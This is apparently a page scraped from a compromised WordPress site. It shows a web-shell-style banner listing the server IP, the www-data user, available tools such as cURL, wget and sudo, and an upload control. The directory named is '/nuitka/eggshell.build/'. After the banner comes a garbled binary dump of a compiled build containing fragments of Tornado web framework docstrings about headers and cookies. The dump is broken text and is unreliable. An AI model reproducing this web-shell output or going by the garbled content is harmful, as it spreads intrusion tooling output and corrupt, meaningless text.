Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /nuitka/eggshell.build/ |
Upload File : |
��
� __class__�.�� �__init__�.�� �application�.�� �request�.�� �_headers_written�.��
� _finished�.�� �_auto_finish�.�� �_prepared_future�.�� �
ObjectDict�.�� �
ui_methods�.�� �items�.�� �ui�.�� �_UIModuleNamespace�.�� �
ui_modules�.�� �_tt_modules�.�� �modules�.�� �clear�.�� �
connection�.�� �set_close_callback�.�� �on_connection_close�.�� �
initialize�.��* �&too many values to unpack (expected 2)�.�� �self�.�� �
_ui_method�.��
� <genexpr>�.��. �*RequestHandler.__init__.<locals>.<genexpr>�.�� �settings�.��D �@An alias for `self.application.settings <Application.settings>`.�.��
� HTTPError�.�� M���.�� �_has_stream_request_body�.�� �_body_future�.�� �done�.�� �
set_exception�.�� �iostream�.�� �StreamClosedError�.��
� exception�.��M XF Called in async handlers if the client closed the connection.
Override this to clean up resources associated with
long-lived connections. Note that this method is called only if
the connection was closed during asynchronous processing; if you
need to do cleanup after every request override `on_finish`
instead.
Proxies may keep a connection open for a time (perhaps
indefinitely) after the client has gone away, so this method
may not be called promptly after the end user closes their
connection.
�.�� �httputil�.�� �HTTPHeaders�.��
�Server�.�� �TornadoServer/%s�.�� �tornado�.�� �version�.�� �Content-Type�.�� �text/html; charset=UTF-8�.�� �Date�.�� �format_timestamp�.�� �time�.�� �_headers�.�� �set_default_headers�.�� �
_write_buffer�.�K�.�� �_status_code�.��
� responses�.�� �_reason�.��5 �1Resets all headers and content for this response.�.��
�escape�.�� �
native_str�.�� �get�.�� �Unknown�.��� X� Sets the status code for our response.
:arg int status_code: Response status code.
:arg str reason: Human-readable reason phrase describing the status
code. If ``None``, it will be filled in from
`http.client.responses` or "Unknown".
.. versionchanged:: 5.0
No longer validates that the response code is in
`http.client.responses`.
�.��- �)Returns the status code for our response.�.�� �_convert_header_value�.��� ��Sets the given response header name and value.
All header values are converted to strings (`datetime` objects
are formatted according to the HTTP specification for the
``Date`` header).
�.�� �add�.��� ��Adds the given response header and value.
Unlike `set_header`, `add_header` may be called multiple times
to return multiple values for the same header.
�.��� ��Clears an outgoing header, undoing a previous `set_header` call.
Note that this method does not apply to multi-valued headers
set by `add_header`.
�.��
�decode�.�� �latin1���.�� �numbers�.�� �Integral�.�� �datetime�.�� �Unsupported header value %r�.�� �RequestHandler�.�� �_INVALID_HEADER_CHAR_RE�.��
�search�.�� �Unsafe header value %r�.�� �
_get_argument�.��
� arguments�.��y Xr Returns the value of the argument with the given name.
If default is not provided, the argument is considered to be
required, and we raise a `MissingArgumentError` if it is missing.
If the argument appears in the request more than once, we return the
last value.
This method searches both the query and body arguments.
�.�� �_get_arguments�.��� ��Returns a list of the arguments with the given name.
If the argument is not present, returns an empty list.
This method searches both the query and body arguments.
�.�� �body_arguments�.��q Xj Returns the value of the argument with the given name
from the request body.
If default is not provided, the argument is considered to be
required, and we raise a `MissingArgumentError` if it is missing.
If the argument appears in the url more than once, we return the
last value.
.. versionadded:: 3.2
�.��� ��Returns a list of the body arguments with the given name.
If the argument is not present, returns an empty list.
.. versionadded:: 3.2
�.�� �query_arguments�.��y Xr Returns the value of the argument with the given name
from the request query string.
If default is not provided, the argument is considered to be
required, and we raise a `MissingArgumentError` if it is missing.
If the argument appears in the url more than once, we return the
last value.
.. versionadded:: 3.2
�.��� ��Returns a list of the query arguments with the given name.
If the argument is not present, returns an empty list.
.. versionadded:: 3.2
�.�� �strip���.�� �_ArgDefaultMarker�.�� �MissingArgumentError�.�� J����.�� �decode_argument�.�� �name�.�� h^��.�� �unicode_type�.�� �_remove_control_chars_regex�.�� �sub�.�� � �.�hY.��
�values�.��
�append�.�� �_unicode�.�� M�.�� �Invalid unicode in %s: %r�.�� �url�.�� �builtins��slice���NK(N��R�.�� X Decodes an argument from the request.
The argument has been percent-decoded and is now a byte string.
By default, this method decodes the argument as utf-8 and returns
a unicode string, but this may be overridden in subclasses.
This method is used as a filter for both `get_argument()` and for
values extracted from the url and passed to `get()`/`post()`/etc.
The name of the argument is provided if known, but may be None
(e.g. for unnamed groups in the url regex).
�.�� �cookies�.��V �RAn alias for
`self.request.cookies <.httputil.HTTPServerRequest.cookies>`.�.�� �value�.��4 X- Returns the value of the request cookie with the given name.
If the named cookie is not present, returns ``default``.
This method only returns cookies that were present in the request.
It does not see the outgoing cookies set by `set_cookie` in this
handler.
�.�� �re�.�� �[\x00-\x20]�.�� �Invalid cookie %r: %r�.�� �_new_cookie�.�� �http�.�� �SimpleCookie�.��
�domain�.��
�utcnow�.��
� timedelta�.��
�days���.��
�morsel�.�� �expires�.�� �path�.�� �max_age�.�� �max-age�.�� ]�(�httponly��secure�e.��8 X1 Sets an outgoing cookie name/value with the given options.
Newly-set cookies are not immediately visible via `get_cookie`;
they are not present until the next request.
expires may be a numeric timestamp as returned by `time.time`,
a time tuple as returned by `time.gmtime`, or a
`datetime.datetime` object.
Additional keyword arguments are set on the cookies.Morsel
directly.
See https://docs.python.org/3/library/http.cookies.html#http.cookies.Morsel
for available attributes.
�.�� Mm��.�� �
set_cookie�.�� � �.�� (hq�path��expires��domain�t�.��� X� Deletes the cookie with the given name.
Due to limitations of the cookie protocol, you must pass the same
path and domain to clear a cookie as were used when that cookie
was set (but there is no way to find out on the server side
which values were used for a given cookie).
Similar to `set_cookie`, the effect of this method will not be
seen until the following request.
�.�� �clear_cookie�.�� h�h���.��q Xj Deletes all the cookies the user sent with this request.
See `clear_cookie` for more information on the path and domain
parameters.
Similar to `set_cookie`, the effect of this method will not be
seen until the following request.
.. versionchanged:: 3.2
Added the ``path`` and ``domain`` parameters.
�.�� �create_signed_value�.�� h+��.�� �expires_days�.��� X� Signs and timestamps a cookie so it cannot be forged.
You must specify the ``cookie_secret`` setting in your Application
to use this method. It should be a long, random sequence of bytes
to be used as the HMAC secret for the signature.
To read a cookie set with this method, use `get_secure_cookie()`.
Note that the ``expires_days`` parameter sets the lifetime of the
cookie in the browser, but is independent of the ``max_age_days``
parameter to `get_secure_cookie`.
A value of None limits the lifetime to the current browser session.
Secure cookies may contain arbitrary byte values, not just unicode
strings (unlike regular cookies)
Similar to `set_cookie`, the effect of this method will not be
seen until the following request.
.. versionchanged:: 3.2.1
Added the ``version`` argument. Introduced cookie version 2
and made it the default.
�.�� �require_setting�.��$ �
cookie_secret��secure cookies���.�� �
cookie_secret�.�� �key_version���.��9 �5key_version setting must be used for secret_key dicts�.�� �key_version�.�� h+�key_version���.��� X� Signs and timestamps a string so it cannot be forged.
Normally used via set_secure_cookie, but provided as a separate
method for non-cookie uses. To decode a value not stored
as a cookie use the optional value argument to get_secure_cookie.
.. versionchanged:: 3.2.1
Added the ``version`` argument. Introduced cookie version 2
and made it the default.
�.�� �
get_cookie�.�� �decode_signed_value�.�� �max_age_days��min_version���.�� X
Returns the given signed cookie if it validates, or None.
The decoded cookie value is returned as a byte string (unlike
`get_cookie`).
Similar to `get_cookie`, this method only returns cookies that
were present in the request. It does not see outgoing cookies set by
`set_secure_cookie` in this handler.
.. versionchanged:: 3.2.1
Added the ``min_version`` argument. Introduced cookie version 2;
both versions 1 and 2 are accepted by default.
�.�� �get_signature_key_version�.��k �gReturns the signing key version of the secure cookie.
The version is returned as int.
�.��3 �/Cannot redirect after headers have been written�.�� M-.�� M..�� M,.�� M�.�� �
set_status�.��
�status�.�� �
set_header�.�� �Location�.�� �utf8�.��
�finish�.��A X: Sends a redirect to the given (optionally relative) URL.
If the ``status`` argument is specified, that value is used as the
HTTP status code; otherwise either 301 (permanent) or 302
(temporary) is chosen based on the ``permanent`` argument.
The default is 302 (temporary).
�.��! �Cannot write() after finish()�.��9 �5write() only accepts bytes, unicode, and dict objects�.��� �|. Lists not accepted for security reasons; see http://www.tornadoweb.org/en/stable/web.html#tornado.web.RequestHandler.write�.�� �json_encode�.��4 �Content-Type��application/json; charset=UTF-8���.��� X� Writes the given chunk to the output buffer.
To write the output to the network, use the `flush()` method below.
If the given chunk is a dictionary, we write it as JSON and set
the Content-Type of the response to be ``application/json``.
(if you want to send JSON as a different ``Content-Type``, call
``set_header`` *after* calling ``write()``).
Note that lists are not converted to JSON because of a potential
cross-site security vulnerability. All JSON output should be
wrapped in a dictionary. More details at
http://haacked.com/archive/2009/06/25/json-hijacking.aspx/ and
https://github.com/facebook/tornado/issues/1009
�.��"